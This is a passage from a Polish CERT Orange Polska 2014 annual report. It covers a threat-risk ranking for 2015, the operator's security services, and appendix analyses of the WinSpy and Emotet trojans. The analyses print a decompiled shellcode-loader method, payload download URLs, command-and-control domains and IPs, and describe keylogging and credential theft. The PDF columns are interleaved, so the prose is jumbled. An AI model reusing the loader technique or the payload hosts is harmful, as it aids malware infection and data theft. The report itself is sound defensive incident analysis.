zaawansowane kraje mogą dziły wyobraźnię internautów. Dodatkowo nasz kraj systematycznie zaczął się pojawiać w informacjach dotyczących mieć spore problemy z uchronieniem się przed tego typu atakami. najgroźniejszych ataków, zaś konflikt za wschodnią granicą, w którym jesteśmy postrzegani jako sprzymierzeniec Ukrainy, sprawił, że również podmioty polskie (komercyjne i związane z administracją państwową) mogą się stać A jeśli nie atak, to może okup? Kilkuka ubiegłorocznych przypadków „ransomware”, celem w cyberwojnie. oprogramowania uzależniającego np. odszyfrowanie plików od zapłacenia okupu, pokazało, że może się to okazać groźnym trendem. Pamiętajmy, że żądania cyber- Ocena zarówno prawdopodobieństwa powszechnego wystąpienia zagrożeń, jak i ewentualnych skutków rzeczywiste- przestępców wcale nie muszą być związane z kwestiami finansowymi. go ich wystąpienia, pozwoliła na stworzenie prostej analizy ryzyka zagrożeń w 2015 roku. Zgodnie z metodyką analizy Werner Thalmeier ryzyka, najgroźniejsze są zagrożenia, których prawdopodobieństwo wystąpienia jest duże, a spowodowane przez nie Director Security Solutions EMEA & CALA straty – poważne.

Ataki na urządzenia medyczne Wykorzystanie gier sieciowych w atakach 5 Zagrożenla dla platformy iOS Zagrożenla związane z „Internet of Things” Kradzież wirtualnych walut 4,5 Ataki na system DNS Zagrożenia dla platformy Windows Phone/Mobile” W 2015 roku według Fundacji Bezpieczna Cyberprzestrzeń, która przygotowała Ataki na platformy hostingowe 13 raport o zagrożeniach w internecie , powinniśmy się przygotować na trzy główne 4 Ataki na systemy sterowania przemysłowego (SCADA)

rodzaje zagrożeń: ożenia Zagrożenia typu ransomware/scareware • phishing z wykorzystaniem poczty elektronicznej i serwisów WWW – 4,6714, Haktywizm Zagrożenia związane z BYOD • zagrożenia dla platformy Android – 4,28, 3,5 • ataki DDoS na podmioty komercyjne – 4,28. Ataki na cloud-computing Cyberkonflikty pomiędzy państwami powiązane z atakami dedykowanymi

Niechlubnym liderem od lat pozostają akcje phishingowe, choć w ubiegłym roku poziom zagr 3 Powstawanie botnetów opartych oceniane były jako nieco mniej prawdopodobne ryzyko (4,39). Opinia ekspertów po- na platformach mobilnych twierdza kontynuację trendu związanego z bardzo systematycznym i trudnym do Zagrożenia w serwisach społecznościowych wyeliminowania zagrożeniem. Ataki drive-by download 2,5 Ataki DDoS na administracjępubliczną To efekt ciągłego występowania słabości w najpopularniejszych systemach operacyj- Akcje cyberszpiegowskie na tle politycznym nych i aplikacjach oraz wciąż niskiego poziom świadomości użytkowników, nieaktu- APT – ataki ukierunkowane na organizacje 2 Wycieki baz danych zawierające dane osobowe, alizujących systemów i stosunkowo łatwo ulegających socjotechnice. hasła, numry kart kredytowych itd. 2 2,5 3 3,5 4 4,5 5 Infekcje Androida to w różnych statystykach minimum 90 procent wszystkich infekcji Zagrożenia dla platformy Android na platformy mobilne. Trend ten systematycznie się utrzymuje i nie widać przesłanek Mirosław Maj Ataki DDoS na podmioty komercyjne zapowiadających zmianę. Pozostaje mieć nadzieję, że użytkownicy zaczną bardziej prawdopodobieństwo wystąpienia Phishing z wykorzystaniem poczty elektronicznej i www Fundacja Bezpieczna Cyberprzestrzeń dbać o swoje telefony, przede wszystkim aktualizując posiadaną wersję Androida. Być może również poprawi się wykrywalność zainfekowanych aplikacji dostępnych w Google Play oraz skuteczność powiadamiania o nich. Rysunek 5. Analiza ryzyka zagrożeń na 2015 rok wg Fundacji Bezpieczna Cyberprzestrzeń

Ataki DDoS na podmioty komercyjne to nowa pozycja w naszym rankingu, dodana Kluczowe wydają się zatem zagrożenia umieszczone na wykresie w prawym górnym rogu, to jest: na prośbę uczestników badania. DDoS to jeden z najpowszechniejszych typów ata- • wycieki baz danych zawierających dane osobowe, hasła, numery kart kredytowych, itd. (4,22; 4,13), ku w naszym kraju, wręcz chleb powszedni wielu organizacji komercyjnych (praw- • APT – ataki ukierunkowane na organizacje (4,17; 4,13), dopodobieństwo ataków na podmioty administracji państwowej zostało ocenione • akcje cyberszpiegowskie na tle politycznym (4,15; 3,95), nieco niżej, na 4,1). To ataki trudne do wyeliminowania – walka z nimi polega przede • cyberkonflikty pomiędzy państwami powiązane z atakami dedykowanymi (np: Stuxnet) (3,65; 4,5), wszystkim na skutecznej reakcji i mitygacji. • ataki DDoS na podmioty komercyjne (4,28; 3,58).

13 Pełna wersja raportu, wraz z listą osób biorących udział w badaniu, znajduje się pod adresem: https://www.cybsecurity.org/wp-content/uploads/2015/01/Raport_FBC_Cyberzagrozenia_2015.pdf 14 Skala wartościowania w zakresie 1-5 43 Raport CERT Orange Polska za rok 2014

10. Komercyjne usługi bezpieczeństwa Orange Polska

10.4 Audyt oraz automatyzacja procesu zarządzania 10.1 DDoS Protection bezpieczeństwem sieciowym

Monitorowanie w trybie 24/7/365 ruchu sieciowego klienta Za ataki DDoS uważane są w szczególności następujące W ramach usługi zawarte są: Elementem usługi może być Zarządzanie Zmianą w zakre- pod kątem ataku DDoS, tj. anomalii mogących skutkować zagrożenia: • efektywne usystematyzowanie wiedzy dotyczącej syste- sie reguł firewall. Na życzenie klienta usługa może zostać wysyceniem łącza i w efekcie utratą ciągłości procesów • ataki na pasmo potrzebne do świadczenia usługi, mu firewalli u klienta (audyt konfiguracji polityk ochrony), ograniczona wyłącznie do audytu urządzeń bezpieczeń- biznesowych. W przypadku faktycznego ataku następuje np. zalanie datagramami ICMP/UDP, • optymalizacja konfiguracji (optymalizacja wydajności, stwa sieciowego. eliminacja podejrzanych pakietów, do klienta trafia jedy- • ataki na wyczerpanie zasobów systemu świadczące- wykluczenia reguł niedozwolonych, pokrywających się Po uruchomieniu usługi na serwerze z dostępem do infra- nie prawidłowy ruch sieciowy. Usługa pozwala również na go usługę, np. zalanie pakietami z flagą TCP SYN, oraz niezgodnych z wewnętrznymi politykami bezpie- struktury klienta możliwy jest audyt reguł, a także monito- ograniczanie skutków nowo występujących ataków DDoS • ataki na konkretną aplikację wykorzystywaną do czeństwa, zaleceniami wynikającymi z norm, którym rowanie w czasie rzeczywistym zmian w politykach firewalli dzięki filtrowaniu ruchu klienta za pomocą „black” i „white” świadczenia usługi, np. ataki z wykorzystaniem pro- podlega organizacja etc.), z możliwością natychmiastowej notyfikacji o zmianach, list oraz korzystaniu z filtrów tworzonych w oparciu o bazy tokołu HTTP (duża ilość sesji imitujących sesje prze- • efektywna kontrola ochrony poprzez monitorowanie dokładna analiza i czyszczenie reguł oraz raportowanie GeoIP. glądarki użytkownika), DNS lub protokołów aplikacji zmian bieżących i regularne, cykliczne audyty polityk. o niezgodnościach. Rozwiązanie pozwala na analizę urzą- VoIP). dzeń wszystkich liczących się na rynku producentów urzą- dzeń firewall.

10.2 SOC as a Service 10.5 Anty-malware

Monitorowanie w trybie 24/7/365 przez SOC Orange Pol- • integracja źródeł logów, ska kluczowych wskazanych przez klienta systemów biz- • korelacja zdarzeń, Wieloprotokołowa analiza ruchu sieciowego w czasie rze- stujący zaawansowane mechanizmy ukrywania działalno- nesowych. Systemy monitorowanie są pod kątem zdarzeń • monitorowanie zdarzeń w systemach klienta, czywistym, obejmująca zachowanie podejrzanego kodu ści. Ze względu na naturę takich ataków nie ma znanych noszących znamiona incydentu bezpieczeństwa w zakre- • notyfikacja o naruszeniach bezpieczeństwa w trybie oraz generowanych połączeń callback. Przychodzące wcześniej informacji na ich temat, które mogłyby zostać sie ustalonym w umowie z klientem. W ramach usługi określonym w SLA, ataki są wykrywane dzięki wykorzystaniu różnych tech- użyte w procesach korelacji i określania reputacji. zawarte są: • dostęp do portalu i procedur obsługi incydentów, nik detekcji, powiązanych ze szczegółową analizą ataku. • instalacja rozwiązania Security Incident and Event • dostępność analityków i ekspertów w trybie określo- Podejrzane przepływy sieciowe są odtwarzane w maszy- Połączenia wychodzące są analizowane pod kątem nieau- Monitoring (SIEM) w infrastrukturze klienta, nym w SLA, nach wirtualnych przeprowadzających zaawansowane toryzowanych połączeń świadczących o obecności w sie- • raportowanie, administracja i utrzymanie systemu. analizy zachowania malware w środowisku symulującym ci komputerów zainfekowanych przed wdrożeniem usługi, realne stacje robocze. Proces opiera się na analizie zacho- poza siecią lub z wykorzystaniem niesieciowych wektorów wań kodu na zasadzie bezsygnaturowej, co pozwala objąć ataku (np. infekcja poprzez pendrive USB). 10.3 Testy penetracyjne niesklasyfikowany wcześniej malware oraz kod wykorzy-

Przeprowadzenie kontrolowanego ataku na system telein- względu na szybko zmieniający się stan wiedzy (np. nowe formatyczny klienta w celu praktycznej oceny bieżącego exploity). Metodyka badania oparta jest na doświadczeniu stanu bezpieczeństwa systemu, a w szczególności obec- Orange Polska. Nasi testerzy mają certyfikaty potwierdza- ności znanych podatności i odporności na próby przeła- jące ich kompetencje i etykę: CISSP (Certified Information mania zabezpieczeń. Analiza przeprowadzana z perspek- Systems Security Professional), CEH (Certified Ethical tywy potencjalnego włamywacza może zawierać aktywne Hacker). Testy penetracyjne wykonywane przez Orange wykorzystywanie podatności (np. poprzez użycie explo- Polska dają klientowi obiektywną i niezależną ocenę rze- itów). W przeciwieństwie do usług audytu bezpieczeństwa czywistego poziomu bezpieczeństwa jego systemów. testy penetracyjne nie muszą się odbywać według sforma- W ofercie znajdują się testy blackbox infrastruktury oraz lizowanej metodologii, której zbudowanie byłoby trudne ze aplikacji internetowych.

12 Źródło: www.cvedetails.com 44 45 Raport CERT Orange Polska za rok 2014

11. Załączniki 11.1 Załącznik 1. Analiza malware WinSpy (na komputery stacjonarne)

Przedmiotem analizy był załącznik wiadomości spamo- W momencie rozpoczęcia analizy trojan wraz z programem wej rozsyłanej losowo do polskich internautów. Jej ele- uruchamiającym był wykrywany przez 15 z 35 sygnaturo- mentem było archiwum ZIP o nazwie „W_dla_rachun- wych silników AV. ku_2014_09_01.pdf.zip”. Zawartością archiwum był Poniżej znajduje się lista modułów wykorzystywanych wykonywalny plik .exe o nazwie „dla rachunku 2014 09 przez trojana w trakcie infekowania systemu użytkownika: Numer załącznika Tytuł 01.pdf.exe”. Załącznik 1 Analiza malware WinSpy (na komputery stacjonarne) 1209child_dump 101638299f8db1f722b8b0b860d96633 PE32/EXE 32-bit (GUI) 184KB 2014-09-06 Załącznik 2 Analiza malware Emotet (na komputery stacjonarne) 14:46:53 Załącznik 3 Analiza malware NotCompatible.C (na urządzenia z systemem Android) 1209dmp_dll.dll 4937b8fbc1099b16efde5c9255fce7fb PE32/DLL 32-bit (GUI) 136KB 2014-09-06 14:46:50 Załącznik 4 Analiza podatności Heartbleed bot.exe 0cdd1affd044dfd076d8a28669136788 PE32/DLL 32-bit (GUI) 237.5KB 2014-09-12 Załącznik 5 Analiza podatności Shellshock 08:10:32 Załącznik 6 Analiza podatności Poodle dla rachunku 2014 09 35926348c1f5366fd06f6a70042e3458 PE32/EXE .NET (GUI) 238.5KB 2014-09-11 01.pdf.exe 09:07:09 Załącznik 7 Inne interesujące podatności Rysunek 6. Lista modułów wykorzystywanych przez trojana

Pierwsza część aplikacji, napisana w języku C# – tzw. Kod loadera jest zaciemniony, nazwy wszystkich zmien- loader, jedynie przenoszący główną część trojana – po- nych, metod i klas mają postać losową, co utrudnia jego wstała na platformie .Net Framework. Podobną strukturę odczyt bez zastosowania dedykowanych rozwiązań i na- zespół CERT Orange Polska zaobserwował podczas ana- rzędzi. lizy niektórych mutacji bankera Tinba. Opisywany przypa- dek różnił jeden szczegół w funkcjonalności – malware był Dane statyczne zawarte w pliku „dla rachunku 2014 09 kopiowany wraz z loaderem, natomiast Tinba kopiował 01.pdf.exe” dowodzą, że jest to aplikacja stworzona w Mi- wirusa do katalogu instalacyjnego bez wykorzystania śro- crosoft Visual Studio .NET. W polu timestamp znajduje się dowiska .Net. „Opakowanie” plików za pomocą języków informacja o ostatniej kompilacji kodu z 11 września 2014 prekompilowanych/interpretowanych (C#, Java, VB) ma na roku z godziny 09:07:09 GMT. W zasobach aplikacji wystę- celu utrudnienie analizy, a także ograniczenie możliwości puje także informacja o wersji. wykrycia przez programy antywirusowe. Manifest pliku PE32 informuje system, że aplikacja nie Dzięki opisanej powyżej specyfice loader malware’u jest próbuje w sposób widoczny dla użytkownika podnosić łatwo dekompilowalny. uprawnień w systemie z włączonym mechanizmem UAC15. Analiza dynamiczna tego typu złośliwego oprogramowania Podczas dalszej analizy zaobserwowano również, że nie stanowi jedynie wsparcie na pewnych etapach niskopo- próbuje ona nawet obchodzić go w sposób niejawny. ziomowej analizy wirusa. Najwięcej informacji można uzy- Może to być kolejny czynnik ograniczający działanie: jeżeli skać w wyniku statycznej analizy kodu źródłowego. Wirus, użytkownik sam nie uruchomi jej z podniesionymi upraw- żeby działać potrzebuje specyficznego środowiska. Użyte nieniami, wirus może nie uzyskać wystarczających upraw- w tym przypadku .NET Framework domyślnie instalowane nień dostępu do systemu plików, rejestru systemowego jest dopiero w systemie Windows Vista, więc przykładowo i procesów. w standardowej konfiguracji systemu Windows XP bez za- >> Rysunek 7. instalowanej platformy .NET wirus nie działa.

Rysunek 7. Manifest pliku malware

15 Technologia podwyższonej ochrony wprowadzona w Windows Vista/Windows 7, w założeniu ograniczająca dostęp aplikacji momentu autoryzacji przez administratora 47 Raport CERT Orange Polska za rok 2014

Rysunki 8-9. Plik wynikowy ma rozmiar 238.50 KB (244224 bytes). Kod Korzysta on z następujących przestrzeni nazw będących Malware bierze się do pracy samego loadera składa się z dwóch klas oraz zasobów .NET. częścią środowiska .NET Framework.

System.Reflection; System.Runtime.CompilerServices; System.Runtime.InteropServices; System.Security; System.Security.Permissions Metoda Main() wygląda następująco

[STAThread] private static void Main() { IntPtr num = Marshal.AllocHGlobal(MAjlWgp.nmsyypaiA.Length); Marshal.Copy(MAjlWgp.nmsyypaiA, 0, num, MAjlWgp.nmsyypaiA.Length); RamdomWord1211.rzTjsCDLn(num, (uint) MAjlWgp.nmsyypaiA.Length); ((MAjlWgp.XKqNhVAeTgE) Marshal.GetDelegateForFunctionPointer(num, typeof (MAjlWgp.XKqNhVAeTgE)))(); }

Na początku alokowana jest pamięć dynamiczna o wiel- Proces potomny kopiuje plik trojana do katalogu syste-

Rysunki 10-11. kości MAjlWgp.nmsyypaiA.Length (9380 bajty); MajlWgp. mowego C:\WINDOWS\system32, nadając mu losową Złośliwe oprogramowanie nmsyypaiA – składowa typu byte: klasy MAjlWgp. Jest to nazwę. Dodaje również klucze do rejestru systemowego, uruchamia swój proces standardowy 32-bitowy shellcode na platformy Intel oraz które pozwalają mu między innymi na automatyczne uru- AMD. chomienie się po starcie systemu operacyjnego. >> Rysunek 8-9. >> Rysunek 12.

Shellcode jest kopiowany z danych programu do dynamicz- Nazwy, miejsca docelowe na dysku oraz w rejestrze nie zaalokowanego obszaru pamięci (Marshal.Copy(MAjl- mogą się różnić w zależności od wersji procesora (32- lub Wgp.nmsyypaiA, 0, num, MAjlWgp.nmsyypaiA.Length);). 64-bitowego), a także systemu operacyjnego. Następstwem tego jest wywołanie RandomWord1211. Trojan wstrzykuje swój kod oraz dane do procesu Explo- rzTjsCDLn(num, (uint) MAjlWgp.nmsyypaiA.Length), które rer.exe oraz tworzy plik *.bat o zawartości pokazanej na de facto jest wywołaniem ZwProtectVirtualMemory, mają- poprzedniej stronie: cym na celu zmianę praw dostępu do pamięci. W ostat- >> Rysunek 13. niej linijce metody Main() sterowanie przekazywane jest do shellcodu. Działanie skryptu ma na celu usunięcie oryginalnego pli-

Rysunek 12. Gdy sterowanie trafi bezpośrednio do shellcodu, urucha- ku trojana i samego siebie. Po usunięciu plików proces potomny kończy swoje działanie. Klucze trojana zapisane miany jest własny proces jako proces potomny z flagą Kod, który działa w przestrzeni procesu Explorer.exe, w rejestrze systemowym CREATE_SUSPEND. Następnie malware zastępuje w jego pamięci wszystkie sekcje własnym nagłówkiem, kodem deszyfruje swoje dane w pamięci za pomocą prostego i danymi, po czym dołącza obraz biblioteki dll, która będzie algorytmu bazującego na różnicy symetrycznej z kluczem wykorzystywana w dalszych etapach. Zostaje również 0x1251a373. zmieniony kontekst wykonywania kodu oraz przywrócone Po odszyfrowaniu danych pobiera adresy potrzebnych mu wykonanie głównego wątku procesu potomnego. procedur, po czym przechodzi do wykonania swoich funkcji. >> Rysunek 10-11. Rysunek 13. Plik *.bat tworzony przez trojana

48 49 Raport CERT Orange Polska za rok 2014

Rysunek 14. Malware próbuje utworzyć mutex o nazwie {ED290161- zaczyna się od odszyfrowania danych. Wykorzystywana Malware nie zdołał utworzyć 6882-A702-DA71-1ccBAE35102f}. jest procedura bazująca na instrukcji XOR identyczna jak mutexu W przypadku, gdy próba ta się nie powiedzie, aplikacja ta, która odszyfrowuje dane w jednym z wątków trojana przez wywołanie zmodyfikowanej funkcji ExitThread zaczyna w przestrzeni procesu Explorer.exe. wykonywać pustą, niekończącą się pętlę. W efekcie przesta- je wykonywać swoje złośliwe funkcje, ponieważ urządzenie Po odszyfrowaniu danych trojan sprawdza, czy w systemie docelowe nie spełnia zakładanych warunków do infekcji. jest obecny folder w lokalizacji Rysunki 15-17. >> Rysunek 14. %APPDATA%\Microsoft\{775CD561-6A0F-C1F7-2C9B- Malware w akcji 3E8520FF5289}\ Jeśli utworzenie mutexu się powiedzie, trojan zaczyna reje- strować aktywność klawiatury powiązaną z konkretną apli- Należy jednak pamiętać, że w nazwy katalogów oraz klu- kacją. Zapisuje także do plików tymczasowych informacje czy w rejestrze za każdym razem są inne. Jeżeli szukany uwierzytelniające na stronach www, np. cookie, identy- folder istnieje, aplikacja tworzy archiwum ze znajdujących fikatory oraz adresy stron. Następnie archiwizuje dane się w nim plików, a następnie przesyła je do zdalnego ser- w plikach *.cab, nadaje im rozszerzenie *.tmp, po czym wera Command&Control. Jeżeli folder nie istnieje, zostaje uruchamia wątek odpowiedzialny za łączność z kanałem utworzony i przechowywane są w nim pliki zawierające Command&Control. informacje znalezione w systemie operacyjnym użytkow- >> Rysunek 15-17. nika. >> Rysunek 18. Wątek wysyła żądania HTTP do modułu uploadu plików po stronie serwera Command&Control, zawierające szereg Moduł tworzy również klucz rejestru parametrów identyfikujących zainfekowaną maszynę oraz HKCU\Software\AppDataLow\775CD561-6A0F-C1F- wspomniane pliki archiwów. 7-2C9B-3E8520FF5289\Files Opisywana wcześniej biblioteka dll jest uruchamiana w pamięci procesu macierzystego, w związku z czym oraz modyfikuje procedury systemowe CreateProcessA nie jest pokazywana na liście modułów załadowanych do i CreateProcessW w przestrzeni procesu, w którym dzia- pamięci procesu. Zawiera szereg procedur rozszerzających ła. W przypadku procesu Explorer.exe daje to możliwość funkcjonalności malware’u i jest ładowana do wszystkich kontrolowania i modyfikowania wszystkich aplikacji uru- nowo powstałych procesów. Wykonanie kodu biblioteki dll chamianych przez użytkownika.

Rysunek 18. Pliki w folderze zakładanym przez malware

50 51 Raport CERT Orange Polska za rok 2014

Rysunek 19. Kolejną z funkcjonalności omawianej biblioteki jest usuwanie to wartość losowa) Funkcjonalności opisywanego z cache przeglądarki adresów serwerów Command&Con- Install= malware trol oraz uruchamianie i komunikacja z innymi aplikacjami HKCU\Software\AppDataLow\E15E01AE-8A43-A- za pomocą potoków nazwanych. Moduł wyszukuje również 415-7224-33F6EF98178A w rejestrze systemowym i plikach konfiguracyjnych dane HKCU\Software\AppDataLow\E15E01AE-8A43-A- autoryzacyjne do serwerów pocztowych, poza tym zawiera 415-7224-33F6EF98178A\Files w sobie procedury odpowiedzialne za kradzież kontaktów = od klientów pocztowych w systemie Windows oraz wykrada dane z aplikacji Lotus WordPro. Malware gromadzi także Pliki powiązane z trojanem: dane o systemie operacyjnym użytkownika. dla rachunku 2014 09 01.pdf.exe – Loader stworzony >> Rysunek 19-20. w .NET C#. 1209child_dump – proces potomny. Rysunek 20. Wszystkie zgromadzone przez Trojana dane są cyklicznie bot.exe – aktualizacja pobierana z serwera zdalnego. Dane gromadzone przez malware pakowane do archiwów *.cab, a następnie przesyłane na 1209dmp_dll.dll – biblioteka współdzielona wykorzystywa- serwer zdalny. na przez zainfekowany proces Explorer.exe >> Rysunek 21. Podsumowanie Domeny i adresy IP powiązane z infekcją systemu: Jedną z funkcji opisywanego malware’u jest rejestrowanie 46.30.42.166 – serwer z którego pobierane są aktualizacje generowanych przez użytkownika naciśnięć klawiszy. Gro- oraz pliki binarne http://46.30.42.166/1/bot.exe. madzi on także informacje o systemie operacyjnym, który donkixot17.net – serwer Command&Control, do którego zainfekował, wykrada dane uwierzytelniające do serwerów Rysunek 21. przesyłane są wykradzione dane. pocztowych, stron www, książki adresowe od klientów Próba wysyłki wykradzionych donkixot17.ru – alternatywna domena Command&Control. pocztowych działających na systemach Windows, a także danych 95.183.8.24 – serwer alternatywny, z którego pobierane informacje związane z aplikacją Lotus WordPro. Następ- są pliki binarne. nie przesyła wszystko do serwera kontrolowanego przez cyberprzestępców. Trojan infekuje także wszystkie nowo Klucze rejestru powiązane z trojanem: powstałe procesy w systemie użytkownika, porozumie- HKCU\Software\Microsoft\Windows\CurrentVersion\Run wa się z innymi uruchomionymi przez siebie aplikacjami =C:\WINDOWS\system32\.exe bibliotek systemowych oraz pobiera i uruchamia inne pliki HKCU\E15E01AE-8A43-A415-7224-33F6EF98178A wykonywalne. (gdzie E15E01AE-8A43-A415-7224-33F6EF98178A

52 53 Raport CERT Orange Polska za rok 2014

Rysunek 22. Podejrzana wiadomość e-mail 11.2 Załącznik 2. Analiza malware Emotet (na komputery stacjonarne)

Trojan bankowy Emotet został zauważony w drugiej poło- przypadku jednak parametry przekazywane do funkcji wie 2014 roku i od tego czasu zdaje się być cyklicznie wydają się nieco bardziej przemyślane i w pierwszej chwi- wykorzystywany w kampanii phishingowej, której celem li mogą zmuszać do zastanowienia, czego efektem jest jest zainfekowanie komputerów użytkowników tego typu wydłużenie czasu niezbędnego do efektywnej analizy. złośliwym oprogramowaniem, a w konsekwencji kradzież wrażliwych danych oraz środków z kont bankowych. Po uruchomieniu Emotet alokuje pamięć dynamiczną wiel- kości rozmiaru sekcji .data pomniejszonego o 4 bajty. Próbka, która dotarła do CERT Orange Polska 7 listopada, Następnie kopiuje do niej odszyfrowany kod i przekazuje różni się od opisywanych już w sieci wariantów tego troja- sterowanie. na tym, że został w niej zaimplementowany algorytm DGA. >> Rysunek 24-25. Rysunek 23. Nie zmieniła się natomiast forma propagacji – w tym przy- „Rachunek” okazuje się plikiem exe padku również był to e-mail w języku niemieckim wysłany Na tym etapie loader inicjalizuje swoje środowisko, pobiera z sieci typu botnet i podszywający się pod T-online. Cele adresy potrzebnych mu bibliotek i funkcji, po czym zmienia Rysunki 24, 25. trojana badanego przez CERT Orange Polska wydają się uprawnienia dostępu do pamięci, tworzy nowy nagłówek Malware zaczyna działać niezmienione – nadal są to klienci niemieckiej bankowości oraz sekcje pliku wykonywalnego, do których kopiowane internetowej. są odszyfrowane dane oraz kod trojana. W tym momencie sterowanie przekazywane jest do prawdziwej funkcji głów- Metoda infekcji nej loadera. Na skrzynkę pocztową użytkownika, z reguły w okresie >> Rysunek 26-27. rozliczeń (koniec/początek miesiąca), trafia e-mail rzekomo Emotet w funkcji głównej loadera tworzy wpis w klu- Rysunki 26-27. pochodzący od któregoś z operatorów telekomunikacyj- czu rejestru pozwalającym na jego autouruchomienie po Dalszy ciąg inicjalizacji nych, nakłaniający użytkowników do kliknięcia w link w celu pobrania archiwum „.zip”, pod pretekstem pobrania danych restarcie systemu oraz sprawdza, czy istnieje jego kopia związanych z rachunkiem telefonicznym za bieżący miesiąc. w lokalizacji docelowej. Jeżeli plik nie istnieje w określonym >> Rysunek 22. katalogu, zostaje tam skopiowany. Następnie trojan nadaje sobie uprawnienie SeDebugPri- Link prowadzi do adresu http://nitobreapadel.com.ar/ vilege, pozwalające na dostęp do pamięci innych proce- EQMqdL9nvk, pod którym znajduje się archiwum zip, sów w systemie użytkownika oraz tworzy wątek zdalny w którym z kolei znajduje się plik wykonywalny z rozszerze- infekujący proces Explorer.exe. W końcowej fazie działania niem .pdf.exe oraz zmienioną ikoną imitującą dokument pdf. loadera tworzony i uruchamiany jest skrypt wsadowy usu- >> Rysunek 23. wający plik trojana z lokalizacji, z której został uruchomiony. >> Rysunek 28. Po kliknięciu w fałszywy dokument pdf system operacyjny Rysunek 28. użytkownika zostaje zainfekowany. W zainfekowanym procesie Explorer trojan modyfikuje pro- Skrypt „sprzątający” widoczne cedurę systemową ZwResumeThread. Modyfikacja ta jest pozostałości trojana Sposób działania wykorzystywana do infekowania wszystkich nowo urucha- Analizowaną próbkę można podzielić na dwie zasadnicze mianych aplikacji w systemie operacyjnym użytkownika. części oraz moduły dodatkowe. Loader to część odpo- >> Rysunek 29-30.

wiedzialna za kopiowanie pliku do folderu docelowego Rysunki 29-30. oraz załadowanie głównego modułu do przestrzeni innego Emotet infekuje również wszystkie aktualnie uruchomione Od tego momentu wszystkie procesu. Moduł główny odpowiedzialny jest za infekowa- procesy w systemie operacyjnym, do których ma upraw- uruchamiane aplikacje będą nie innych procesów, komunikację sieciową, pobieranie nienia. Tworzy też klucze rejestru, w których przechowy- infekowane i wysyłanie danych oraz modułów dodatkowych. wane będą dane pobrane z serwerów „C and C” oraz informacje skradzione z systemu użytkownika. Następnie Kod oraz dane trojana są dwukrotnie zaszyfrowane. Korzy- trojan pobiera informacje o systemie operacyjnym oraz sta on także z kryptografii z kluczem publicznym oraz wyko- tworzy klucze szyfrowania na podstawie własnego klu- rzystuje wywołania API z błędnymi parametrami (ma to na cza publicznego. Trojan sprawdza dostępność połączenia celu m.in. oszukanie emulatorów). Ten ostatni mechanizm internetowego do momentu, w którym otrzyma odpowiedź był wykorzystywany także w trojanie carberp, w tym na żądanie HTTP skierowane do witryny www.microsoft.com.

54 55 Raport CERT Orange Polska za rok 2014

Rysunki 31-32. W przypadku, gdy połączenie jest dostępne, Emotet two- chwytywaniem komunikacji sieciowej kierowanej do insty- Trojan Emotet wykorzystuje rzy 16 wątków odpowiedzialnych za generowanie nazw tucji finansowych, których lista została pobrana z serwera algorytm generowania domen domenowych. Algorytm DGA wykorzystywany przez troja- C&C i zapisana w rejestrze. Ponadto omawiana biblioteka (DGA) na bazuje na wartościach uzyskanych w wyniku wywołań modyfikuje niektóre funkcje przeglądarek internetowych SystemTimeToFileTime i RtlTimeToSecondsSince1970. takich jak Google Chrome, Firefox czy internet Explorer, co >> Rysunek 31-32. umożliwia jej przechwytywanie w sposób niezauważalny dla użytkownika zaszyfrowanego ruchu sieciowego (np. za Poprawność domeny weryfikowana jest przez wywołanie pomocą protokołu SSL). procedury DnsQuery_A. >> Rysunek 35. W momencie prowadzenia analizy niektóre z tych domen były sinkholowane. Implementacja tego typu algorytmów Przechwycone w ten sposób dane są kodowane, zapisy- przyczynia się z reguły do podniesienia żywotności sieci wane w rejestrze systemowym oraz cyklicznie wysyłane na botnet stworzonej na bazie danego typu złośliwego opro- serwer kontrolowany przez cyberprzestępców. gramowania. Znacznie trudniej blokować na poziomie sie- >> Rysunek 36. ciowym ruch generowany w ten sposób oraz namierzyć serwer C&C zwłaszcza w przypadku, gdy domeny genero- Podsumowanie i rekomendacje wane przez DGA pełnią wyłącznie rolę proxy. Emotet to stosunkowo nowe zagrożenie, które zmienia nie- >> Rysunek 33. co podejście do kradzieży danych finansowych. Zamiast tradycyjnego modyfikowania kontentu wybranej strony W przypadku wygenerowania poprawnej nazwy domeno- internetowej wykorzystuje przechwytywanie całej komuni- wej aktywnego serwera Command&Control trojan zaczy- kacji sieciowej z określonym bankiem niezależnie od tego, na szyfrować dane, używając algorytmu RC4, następnie czy jest ona szyfrowana czy nie. Ponadto, w odróżnieniu dodaje do nich podpis cyfrowy i przesyła za pomocą żąda- od wielu innych trojanów bankowych, stara się unikać sys- nia HTTP do serwera zdalnego. temu plików i zamiast niego korzysta z rejestru systemo-

Rysunek 33. Po otrzymaniu odpowiedzi Emotet weryfikuje poprawność wego (to również, przynajmniej w założeniu, miało zmniej- Charakterystyczny „bełkot” jej podpisu cyfrowego (pierwsze 128 bajtów odpowiedzi). szyć stopień wykrywalności). Emotet można uznać także w nazwach domen Jeśli sygnatura jest poprawna, trojan odszyfrowuje dane za zagrożenie modułowe – pobierany moduł może zostać wygenerowanych otrzymane z serwera. W danych tych poza sygnaturą znaj- zmieniony na inny lub trojan będzie w cyklu swojego życia przy użyciu DGA duje się moduł .dll oraz dane konfiguracyjne wykorzysty- pobierał wyłącznie jeden moduł dodatkowy. wane przez ten moduł, które zawierają listę instytucji finansowych będących celem cyberprzestępców. W styczniu 2015 roku wszystkie warianty Emoteta były >> Rysunek 34. wykrywane przez większość silników antywirusowych. By uniknąć zagrożenia, należy pamiętać o zainstalowaniu Rysunek 34. Dane te są następnie kodowane za pomocą instrukcji XOR w systemie operacyjnym tego typu oprogramowania oraz Analizowana wersja trojana była i zapisywane w rejestrze systemu operacyjnego. Moduł jego regularnej aktualizacji. Użytkownicy powinni być rów- zbudowana pod kątem rynku dll odebrany z serwera C&C ładowany jest do wszystkich nież ostrożni podczas korzystania z internetu, nie instalo- niemieckiego procesów, do których Emotet ma uprawnienia. W anali- wać aplikacji z niezaufanych źródeł ani nie klikać w podej- zowanym przez nas wariancie zajmuje się również prze- rzane linki lub załączniki wiadomości e-mail.

Rysunek 36. Rysunek 35. Przechwycone dane zapisywane Emotet potrafi w niezauważalny są w zakodowanej formie sposób przechwytywać ruch SSL w rejestrze systemowym

56 57 Raport CERT Orange Polska za rok 2014

11.3 Załącznik 3. Analiza malware NotCompatible.C (na urządzenia mobilne z systemem Android)

